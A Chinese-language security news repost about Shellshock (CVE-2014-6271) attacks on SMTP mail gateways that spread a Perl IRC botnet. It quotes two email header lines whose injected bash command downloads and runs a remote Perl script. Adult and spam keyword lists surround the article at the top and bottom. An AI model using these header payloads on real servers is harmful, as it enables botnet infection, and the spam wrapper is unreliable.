成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Bash破殼漏洞再變身:針對郵件服務器SMTP攻擊

安全 漏洞
Bash破殼漏洞(ShellShock,CVE-2014-6271)新的利用方法又來了!根據互聯網風暴中心( SANS InternetStorm Center )最新消息:破殼漏洞最新利用方法引發的新一輪攻擊正在醞釀中,這一次,破殼漏洞形成的僵尸網絡利用的是郵件服務器SMTP主機,目標是全球SMTP網關!

Bash破殼漏洞(ShellShock,CVE-2014-6271)新的利用方法又來了!根據互聯網風暴中心( SANS InternetStorm Center )最新消息:破殼漏洞最新利用方法引發的新一輪攻擊正在醞釀中,這一次,破殼漏洞形成的僵尸網絡利用的是郵件服務器SMTP主機,目標是全球SMTP網關!

[[121995]]

黑客們在試圖破壞SMTP系統

“嘿,我的老板啊,這次互聯網風暴意味著什么你造嗎?意味著我給你回郵件都是危險的!”(算了,我不回你了啊= =)

這次“破殼”利用的就是感染SMTP網關,試圖在MTAs / MDAs中尋找可利用弱點,然后攻擊者把惡意代碼隱藏在消息數據報頭中!

互聯網風暴中心描述了一個用Perl編寫的IRC DDoS Robot,其Payload擁有“獲取和執行遠程代碼的能力”。

下面一個圖片就是包含“破殼”有效載荷的初始郵件攻擊例子:

Bash破殼漏洞再變身:針對郵件服務器SMTP攻擊

二進制防御系統BDS(Binary Defense Systems)已經主動偵查到最新的攻擊細節。 那些已被破壞系統試圖通過破殼漏洞傳播僵尸網絡,并在每個主要頭字段使用“破殼”漏洞下載僵尸網絡腳本。攻擊者利用的字段有:“To:”字段、“From:”字段、 “Subject”字段、 “Date:”字段、 “Message ID:” 等等還有其他未發現字段

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

BDS還還透露:

“為了感染SMTP網關,并把它添加到現有僵尸網絡設備中去,有一個curl/wget/fetch/perl/lwp/etc的方法正在試圖從耶利哥安全團隊(Jericho Security Team)摧毀基于perl的僵尸網絡。”

自從九月初發現“破殼”起,彈震癥漏洞已經針對目標,在不同類型的設備上重復利用了許多次。許多安全專家也相繼發現了多次利用“破殼”漏洞攻擊全球設備的僵尸網絡,包括攻擊 VOIP系統 和利用競選傳播惡意軟件的混亂的僵尸網絡。

蜜罐由專家AlienVault實驗室檢測到試圖利用“破殼”漏洞的兩個不同惡意軟件樣本,消息披露至此不超過48小時。

9月底,火眼研究室(FireEye)也預言:“從惡意流量上觀察發現,試圖利用Bash bug的大規模網絡攻擊正在路上。”

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2014-10-14 14:52:28

2014-09-26 08:55:03

漏洞bash破殼安全漏洞

2021-12-30 08:36:13

漏洞Apache服務器

2010-03-25 10:33:36

郵件服務器

2012-09-24 16:47:39

郵件服務器SMTP垃圾郵件

2009-05-13 09:14:43

2014-10-22 09:33:10

2022-05-19 14:36:54

SQL Server服務器暴力攻擊

2020-09-30 10:11:34

漏洞

2009-08-05 22:19:15

2013-04-26 11:42:00

2022-07-19 16:40:56

漏洞網絡攻擊

2012-02-23 23:46:26

2023-03-22 15:35:48

新華三

2017-05-12 13:58:30

2021-09-08 18:23:34

漏洞攻擊Confluence

2022-08-09 08:22:00

勒索軟件WindowsLinux

2020-07-28 10:46:43

安全郵件服務器漏洞

2012-06-13 13:37:49

PHP

2021-03-18 09:08:44

MicrosoftExchange漏洞
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美不卡 | 国产在线高清 | 91精品国产91久久久久久最新 | 一区二区视频在线观看 | 九九在线| 亚洲 欧美 激情 另类 校园 | 北条麻妃一区二区三区在线视频 | 久久伊人精品一区二区三区 | 久久国产精品久久久久久 | 中文字幕一区二区三区四区五区 | 国产成人精品一区二区三区四区 | 范冰冰一级做a爰片久久毛片 | 久久久久亚洲精品国产 | 中文字幕av中文字幕 | 亚洲国产精品久久久久婷婷老年 | 成人午夜黄色 | 亚洲一级二级三级 | 国产高清视频在线观看播放 | 99久久99热这里只有精品 | 操操日| 天天干天天玩天天操 | 在线播放中文字幕 | 亚洲欧洲中文日韩 | 91久久精品国产91久久性色tv | 久久国内精品 | 国产高清精品在线 | 岛国av免费看 | 99一区二区| av中文字幕在线 | 黄视频免费 | 亚洲男人网 | 久久免费精品视频 | 国产精品一区在线 | 亚洲精品日韩视频 | 91精品国产综合久久久久久首页 | 欧美成人精品欧美一级 | 中文字幕在线观看视频一区 | 精品久久久久久亚洲综合网站 | 久久伊人精品 | 免费看黄色片 | 毛片免费观看视频 |